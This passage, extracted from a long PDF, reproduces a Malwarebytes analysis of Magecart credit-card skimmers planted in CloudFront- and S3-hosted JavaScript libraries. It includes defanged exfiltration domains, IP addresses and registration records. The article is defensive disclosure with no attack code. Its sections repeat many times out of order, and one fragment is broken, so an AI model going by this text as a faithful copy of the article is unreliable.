(IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 198 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 199 of 351\n\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 200 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 201 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 202 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 203 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 204 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 205 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 206 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 207 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 208 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 209 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 210 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 211 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 212 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 213 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 214 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 215 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 216 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 217 of 351\n\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 218 of 351\n\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 219 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 220 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 221 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 222 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nUpdate (06-08-2019): The compromises of Amazon S3 buckets continue and some large sites are being affected.\r\nOur crawler spotted a malicious injection that loads a skimmer for the Washington Wizards page on the official\r\nNBA.com website.\r\nThe skimmer was inserted in this JavaScript library:\r\nhxxps://s3[.]amazonaws[.]com/wsaimages/js/wizards[.]js\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 223 of 351\n\nInterestingly, this same library had already been altered (loading content from com (opens in a new tab)”\u003e) some\r\ntime earlier in January of this year. We have reported this incident to Amazon. A complete archived scan of the\r\npage can be found here.\r\n—\r\nLate last week, we observed a number of compromises on Amazon CloudFront – a Content Delivery Network\r\n(CDN) – where hosted JavaScript libraries were tampered with and injected with web skimmers.\r\nAlthough attacks that involve CDNs usually affect a large number of web properties at once via their supply chain,\r\nthis isn’t always the case. Some websites either use Amazon’s cloud infrastructure to host their own libraries or\r\nlink to code developed specifically for them and hosted on a custom AWS S3 bucket.\r\nWithout properly validating content loaded externally, these sites are exposing their users to various threats,\r\nincluding some that pilfer credit card data. After analyzing these breaches, we found that they are a continuation of\r\na campaign from Magecart threat actors attempting to cast a wide net around many different CDNs.\r\nThe ideal place to conceal a skimmer\r\nCDNs are widely used because they provide great benefits to website owners, including optimizing load times and\r\ncost, as well as helping with all sorts of data analytics.\r\nThe sites we identified during a crawl had nothing in common other than the fact they were all using their own\r\ncustom CDN to load various libraries. In effect, the only resulting victims of a compromise on their CDN\r\nrepository would be themselves.\r\nThis first example shows a JavaScript library that is hosted on its own dedicated AWS S3 bucket. The skimmer\r\ncan be seen appended to the original code and using obfuscation to conceal itself.\r\nThis second case shows the skimmer injected not just in one library, but several contained within the same\r\ndirectory, once again part of an S3 bucket that is only used by this one website.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 224 of 351\n\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 225 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 226 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 227 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the criminals.\r\nHistorical passive DNS records show that on 05-25-2019, font-assets[.]com started resolving to 45.114.8[.]161.\r\nThe same thing happened for ww1-filecloud[.]com, which ended up resolving to 45.114.8[.]159 after a few swaps.\r\nFinding and exploiting weaknesses\r\nThis type of attack on private CDN repositories is not new, but reminds us that threat actors will look to exploit\r\nanything that is vulnerable to gain entry into systems. Sometimes, coming in from the front door might not be a\r\nviable option, so they will look for other ways.\r\nWhile this example is not a third-party script supply-chain attack, it is served from third-party infrastructure.\r\nBeyond applying the same level of access control to your own CDN-hosted repositories as your actual website,\r\nother measures—such as validation of any externally loaded content (via Subresource Integrity checks, for\r\nexample)—can save the day.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 228 of 351\n\nWe reached out to the victims we identified in this campaign and several have already remediated the breach. In\r\nother cases, we filed an abuse report directly with Amazon. Malwarebytes users are protected against the\r\nskimmers mentioned in this blog and the new ones we discover each day.\r\nIndicators of Compromise (IoCs)\r\nww1-filecloud[.]com,45.114.8[.]159\r\ncdn-imgcloud[.]com,45.114.8[.]160\r\nfont-assets[.]com,45.114.8[.]161\r\nwix-cloud[.]com,45.114.8[.]162\r\njs-cloudhost[.]com,45.114.8[.]163\r\nFinally, here’s another example where the skimmer was injected in various scripts loaded from a custom\r\nCloudFront URL.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 229 of 351\n\nExfiltration gate\r\nThis skimmer uses two levels of encoding (hex followed by Base64) to hide some of its payload, including the\r\nexfiltration gate (cdn-imgcloud[.]com). The stolen form data is also encoded before being sent back to the\r\ncriminal infrastructure.\r\nWhile we would have expected to see many Magento e-commerce shops, some of the victims included a news\r\nportal, a lawyer’s office, a software company, and a small telecom operator, all running a variety of Content\r\nManagement Systems (CMSes).\r\nAs such, many did not even have a payment form within their site. Most simply had a sign up or login form\r\ninstead. This makes us believe that Magecart threat actors may be conducting “spray and pray” attacks on the\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 230 of 351\n\nCDNs they are able to access. Perhaps they are hoping to compromise libraries for sites with high traffic or tied to\r\nvaluable infrastructure from which they can steal input data.\r\nConnection with existing campaign\r\nThe skimmer used in this attack looked eerily familiar. Indeed, by going back in time, we noted it used to have the\r\nsame exfiltration gate (font-assets[.]com) identified by Yonathan Klijnsma in RiskIQ’s report on several recent\r\nsupply-chain attacks.\r\nRiskIQ, in partnership with Abuse.ch and the Shadowserver Foundation, sinkholed both that domain and another\r\n(ww1-filecloud[.]com) in an effort to disrupt the criminal’s infrastructure.\r\nhttps://blog.malwarebytes.com/threat-analysis/2019/06/magecart-skimmers-found-on-amazon-cloudfront-cdn/\r\nPage 231 of 351\n\nA cursory look at this new cdn-imgcloud[.]com gate shows that it was registered just a couple days after the\r\nRiskIQ blog post came out and uses Carbon2u (which has a certain history) as nameservers.\r\nCreation Date: 2019-05-16T07:12:30Z\r\nRegistrar: Shinjiru Technology Sdn Bhd\r\nName Server: NS1.CARBON2U.COM\r\nName Server: NS2.CARBON2U.COM\r\nThe domain resolves to the IP address 45.114.8[.]160 that belongs to ASN 55933 in Hong Kong. By exploring the\r\nsame subnet, we can find other exfiltration gates also registered recently.\r\nWhat we can also see from the above VirusTotal graph, is that the two domains (font-assets[.]com and ww1-\r\nfilecloud[.]com) that were previously sinkholed to 179.43.144[.]137 (server in Switzerland) came back into the\r\nhands of the 